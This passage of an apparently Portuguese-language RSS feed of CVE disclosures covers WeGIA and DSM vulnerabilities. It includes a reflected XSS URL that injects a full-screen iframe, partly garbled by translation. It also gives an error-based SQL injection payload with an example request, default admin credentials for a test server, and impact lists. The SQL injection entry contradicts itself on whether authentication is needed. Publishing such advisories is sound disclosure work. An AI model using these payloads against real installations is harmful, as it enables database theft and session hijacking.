&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-url&amp;#34;&amp;gt;Exemplo de URL:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20to p% 3A0% 3B% 20esquerda%3A0%3B%20inferior%3A0%3B%20direita%3A0%3B%20largura%3A100%25%3B%20altura%3A100%25%3B%20borda%3A nenhum% 3B% 20margem% 3A0% 3B% 20preenchimento% 3A0%3B% 20overflow% 3Ahidden% 3B% 20z-index% 3A999999% 3B% 22% 3E% 3C% 2Fiframe% 3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O payload sai do contexto existente (provavelmente uma atribuição de variável JavaScript) usando a tag &amp;lt;code&amp;gt;script&amp;lt;/code&amp;gt; e injeta um iframe externo que cobre toda a área visível.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23722/image.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;875&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23722/image_hu_bd7167f4b849a834.png 480w, /p/cve-2026-23722/image_hu_f207a24f416f7704.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;219&amp;#34;
		data-flex-basis=&amp;#34;526px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcos50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/marcos-tolosa/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcos Tolosa&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 16 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-23723</title>
        <link>https://www.cvehunters.com/pt/p/cve-2026-23723/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2026-23723/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-23723-vulnerabilidade-de-injeção-sql-error-based-no-parâmetro-id_memorando-do-endpoint-atendido_ocorrenciacontrole&amp;#34;&amp;gt;CVE-2026-23723: Vulnerabilidade de Injeção SQL (Error-Based) no parâmetro &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL autenticada foi identificada no endpoint &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; através do parâmetro &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;. Essa falha permite a exfiltração completa do banco de dados, a exposição de informações pessoais sensíveis e a leitura arbitrária de arquivos em ambientes mal configurados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;1 AND extractvalue(1, concat(0x7e, @@Version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;url-de-exemplo&amp;#34;&amp;gt;URL de exemplo:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;metodo=listarTodosComAnexo&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no sistema WeGIA (usuário: admin, senha: wegia) e obtenha um cookie de sessão válido.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;A vulnerabilidade foi confirmada no servidor oficial de testes de segurança: &amp;lt;code&amp;gt;sec.wegia.org:8000&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Envie uma solicitação GET para o endpoint vulnerável com o seguinte payload:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-23723-vulnerabilidade-de-injeção-sql-error-based-no-parâmetro-id_memorando-do-endpoint-atendido_ocorrenciacontrole&amp;#34;&amp;gt;CVE-2026-23723: Vulnerabilidade de Injeção SQL (Error-Based) no parâmetro &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23723&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL autenticada foi identificada no endpoint &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt; através do parâmetro &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;. Essa falha permite a exfiltração completa do banco de dados, a exposição de informações pessoais sensíveis e a leitura arbitrária de arquivos em ambientes mal configurados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;Atendido_ocorrenciaControle&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;1 AND extractvalue(1, concat(0x7e, @@Version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;url-de-exemplo&amp;#34;&amp;gt;URL de exemplo:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;metodo=listarTodosComAnexo&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version))
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no sistema WeGIA (usuário: admin, senha: wegia) e obtenha um cookie de sessão válido.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;A vulnerabilidade foi confirmada no servidor oficial de testes de segurança: &amp;lt;code&amp;gt;sec.wegia.org:8000&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Envie uma solicitação GET para o endpoint vulnerável com o seguinte payload:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23723/image.png&amp;#34;
	width=&amp;#34;1481&amp;#34;
	height=&amp;#34;573&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23723/image_hu_50c6c393ec22c46a.png 480w, /p/cve-2026-23723/image_hu_ea035905a73cb2a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;258&amp;#34;
		data-flex-basis=&amp;#34;620px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Observe que o sistema retorna uma mensagem de erro, confirmando a injeção:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23723/image-1.png&amp;#34;
	width=&amp;#34;681&amp;#34;
	height=&amp;#34;32&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23723/image-1_hu_61812a024882cb4a.png 480w, /p/cve-2026-23723/image-1_hu_4211dac53e8c18cb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;2128&amp;#34;
		data-flex-basis=&amp;#34;5107px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a dados sensíveis (por exemplo, usuários, senhas, logs).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração do banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalação para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Comprometimento total do aplicativo se combinado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Este problema afeta todos os usuários e ambientes, pois não requer autenticação e é acessível por meio de um endpoint público.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 16 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12511</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-12511/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-12511/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12511-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-12511: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de extensões da administração do DSM.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12511-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-12511: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de extensões da administração do DSM.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
